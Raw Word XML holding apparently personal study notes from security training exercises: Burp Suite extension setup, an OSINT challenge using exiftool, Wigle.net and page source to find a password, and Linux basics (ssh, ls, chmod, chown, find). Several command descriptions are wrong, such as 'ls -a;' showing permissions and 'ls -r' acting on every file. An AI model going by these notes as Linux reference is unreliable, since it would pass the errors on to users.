    <w:p w14:paraId="61BD0644" w14:textId="36E51335" w:rsidR="0079497D" w:rsidRPr="0084205E" w:rsidRDefault="0079497D" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Python environment – </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>jython</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> standalone</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D1EA8BC" w14:textId="541F8EAE" w:rsidR="0079497D" w:rsidRPr="0084205E" w:rsidRDefault="0079497D" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Download jar file and move to documents, select and upload </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59B19AE0" w14:textId="31517E7B" w:rsidR="00F911F0" w:rsidRPr="0084205E" w:rsidRDefault="00F911F0" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>BApp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> Store</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E6DF7BF" w14:textId="057AB65D" w:rsidR="00F911F0" w:rsidRPr="0084205E" w:rsidRDefault="00F911F0" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Authorize, bookmarks, logger++</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FB2B186" w14:textId="62A48B22" w:rsidR="00FC42DB" w:rsidRPr="0084205E" w:rsidRDefault="00FC42DB" w:rsidP="0084205E">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7372522D" w14:textId="59245FEA" w:rsidR="00FC42DB" w:rsidRPr="0084205E" w:rsidRDefault="00AC5E4C" w:rsidP="0084205E">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>OhSINT</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6380703E" w14:textId="26CDC78D" w:rsidR="00AC5E4C" w:rsidRPr="0084205E" w:rsidRDefault="00E55C1A" w:rsidP="0084205E">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>Exiftool</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2FCB5F7B" w14:textId="33C3F522" w:rsidR="00E55C1A" w:rsidRPr="0084205E" w:rsidRDefault="00E55C1A" w:rsidP="0084205E">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Author of image = copyright, GPS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="245E904E" w14:textId="3B401BDE" w:rsidR="00B2417A" w:rsidRPr="0084205E" w:rsidRDefault="00B2417A" w:rsidP="0084205E">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Google search</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2579F355" w14:textId="1192C2EE" w:rsidR="00B2417A" w:rsidRPr="0084205E" w:rsidRDefault="00B2417A" w:rsidP="0084205E">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Wigle.net</w:t>
      </w:r>
      <w:r w:rsidR="00BF39B9" w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00BF39B9" w:rsidRPr="0084205E">
        <w:t>cybernullius</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00BF39B9" w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> and saved password to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00BF39B9" w:rsidRPr="0084205E">
        <w:t>firefox</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="588C4ABA" w14:textId="464CD444" w:rsidR="00B2417A" w:rsidRPr="0084205E" w:rsidRDefault="00BF39B9" w:rsidP="0084205E">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Inspect element – search for </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>=”true</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>” signs – potential indication of a password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C780A33" w14:textId="742C03AA" w:rsidR="00BF39B9" w:rsidRPr="0084205E" w:rsidRDefault="00BF39B9" w:rsidP="0084205E">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D6EAB46" w14:textId="276B74B5" w:rsidR="00BF39B9" w:rsidRPr="0084205E" w:rsidRDefault="007C0135" w:rsidP="0084205E">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Linux Fundamentals</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6068FA4D" w14:textId="00DFE250" w:rsidR="007C0135" w:rsidRPr="0084205E" w:rsidRDefault="007C0135" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>Ssh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>username@ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="45D2A8F1" w14:textId="29974E43" w:rsidR="007C0135" w:rsidRPr="0084205E" w:rsidRDefault="007C0135" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AE4DEF0" w14:textId="6B608BB8" w:rsidR="007C0135" w:rsidRPr="0084205E" w:rsidRDefault="007C0135" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Echo hello – echo returns input back to you</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71DD0DEC" w14:textId="01E80C99" w:rsidR="00377396" w:rsidRPr="0084205E" w:rsidRDefault="0019714A" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>“</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>uname</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> -a” – determine </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> kernel version</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="544A51A8" w14:textId="39302B8F" w:rsidR="007C0135" w:rsidRPr="0084205E" w:rsidRDefault="007C0135" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Commands have flags</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0803EE96" w14:textId="1A38E261" w:rsidR="007C0135" w:rsidRPr="0084205E" w:rsidRDefault="007C0135" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>&lt;command&gt;&lt;flag&gt;&lt;input&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="135157D7" w14:textId="76E9476C" w:rsidR="007C0135" w:rsidRPr="0084205E" w:rsidRDefault="007C0135" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Learn about them with &lt;man&gt; command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E65EAD9" w14:textId="1F172423" w:rsidR="007C0135" w:rsidRPr="0084205E" w:rsidRDefault="007C0135" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Ex. Man echo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="025201AE" w14:textId="42528E63" w:rsidR="007C0135" w:rsidRPr="0084205E" w:rsidRDefault="007C0135" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>&lt;command&gt; -n – command without newline</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="742D5443" w14:textId="1C4218F3" w:rsidR="007C0135" w:rsidRPr="0084205E" w:rsidRDefault="007C0135" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>“ls” command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EC3EF01" w14:textId="00A04559" w:rsidR="007C0135" w:rsidRPr="0084205E" w:rsidRDefault="007C0135" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>“ls -a” – all</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F9121EE" w14:textId="0678A22C" w:rsidR="00C211F2" w:rsidRPr="0084205E" w:rsidRDefault="00C211F2" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>“ls -a;” – shows permissions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CF234D2" w14:textId="56DDB6A6" w:rsidR="00F437C7" w:rsidRPr="0084205E" w:rsidRDefault="00F437C7" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>normal root permissions should be -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>rw</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>-r- -r- -</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12B4DBAB" w14:textId="786BF025" w:rsidR="00F437C7" w:rsidRPr="0084205E" w:rsidRDefault="00F437C7" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>abnormal example of a file that is misconfigured</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FE8BB0B" w14:textId="1A9B2EEB" w:rsidR="00F437C7" w:rsidRPr="0084205E" w:rsidRDefault="00F437C7" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>rw</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>rw</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>-r- -</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7268708F" w14:textId="790E9BEB" w:rsidR="003528C8" w:rsidRPr="0084205E" w:rsidRDefault="003528C8" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>“ls -r” – allows to operate on every file in the directory at once</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BCF24BD" w14:textId="416C035E" w:rsidR="00C211F2" w:rsidRPr="0084205E" w:rsidRDefault="00C211F2" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>- r w - r - - r- -, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67CA1765" w14:textId="0C79DC45" w:rsidR="00C211F2" w:rsidRPr="0084205E" w:rsidRDefault="00C211F2" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Changed with “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>chown</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>” command – which changes user and group of any file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A03F618" w14:textId="14217736" w:rsidR="00C211F2" w:rsidRPr="0084205E" w:rsidRDefault="00C211F2" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Syntax: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>chown</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>user:group</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62E7171A" w14:textId="3F8C5DA0" w:rsidR="00C211F2" w:rsidRPr="0084205E" w:rsidRDefault="00C211F2" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Ex. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>Chown</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> shiba</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>2:shiba</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>2 file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06F09985" w14:textId="02116203" w:rsidR="003528C8" w:rsidRPr="0084205E" w:rsidRDefault="003528C8" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Or </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>chown</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> &lt;user&gt; &lt;file&gt; to change user but keep group</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C70C62C" w14:textId="408080BB" w:rsidR="00C211F2" w:rsidRPr="0084205E" w:rsidRDefault="00C211F2" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Only usable if above target user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CD7513D" w14:textId="20E291E4" w:rsidR="003528C8" w:rsidRPr="0084205E" w:rsidRDefault="003528C8" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>Chmod</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> allows set different permissions and control who can read it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F03A801" w14:textId="5217EB0E" w:rsidR="003528C8" w:rsidRPr="0084205E" w:rsidRDefault="003528C8" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>Chmod</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> &lt;permissions&gt; &lt;file&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AA14782" w14:textId="489A1CBA" w:rsidR="003528C8" w:rsidRPr="0084205E" w:rsidRDefault="003528C8" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Using numerical values for permissions (1-7)</w:t>
      </w:r>
      <w:r w:rsidR="003D7307" w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> – user – group – everyone else (0 = no permissions)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="145426D6" w14:textId="24529A55" w:rsidR="003528C8" w:rsidRPr="0084205E" w:rsidRDefault="003528C8" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Ex. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>Chmod</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> 341 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>chmod</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> 777, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>chmod</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> 455</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F32120F" w14:textId="4A05C06D" w:rsidR="007C0135" w:rsidRPr="0084205E" w:rsidRDefault="007C0135" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>“ls -l” - long list format</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59B3FA9A" w14:textId="3456C266" w:rsidR="00260F5E" w:rsidRPr="0084205E" w:rsidRDefault="00260F5E" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>ls -l &lt;file name&gt; - show permissions of file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3933CE70" w14:textId="0543296A" w:rsidR="003744AF" w:rsidRPr="0084205E" w:rsidRDefault="003744AF" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>Find  -</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> list every file in current directory – recursive – will search</w:t>
      </w:r>
      <w:r w:rsidR="00034205" w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> every directory that is in the original directory provided (find / </w:t>
      </w:r>
      <w:r w:rsidR="00034205" w:rsidRPr="0084205E">
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidR="00034205" w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> entire OS searched)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C98809A" w14:textId="7A32C595" w:rsidR="00034205" w:rsidRPr="0084205E" w:rsidRDefault="00034205" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Dependent on permissions for listing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08D2ECD4" w14:textId="365D87E4" w:rsidR="00034205" w:rsidRPr="0084205E" w:rsidRDefault="00034205" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Find </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>dir</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> -user </w:t>
      </w:r>
      <w:r w:rsidRPr="0084205E">
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> list every file owned by specified user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D32FE49" w14:textId="7374EB45" w:rsidR="00034205" w:rsidRPr="0084205E" w:rsidRDefault="00034205" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Find </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
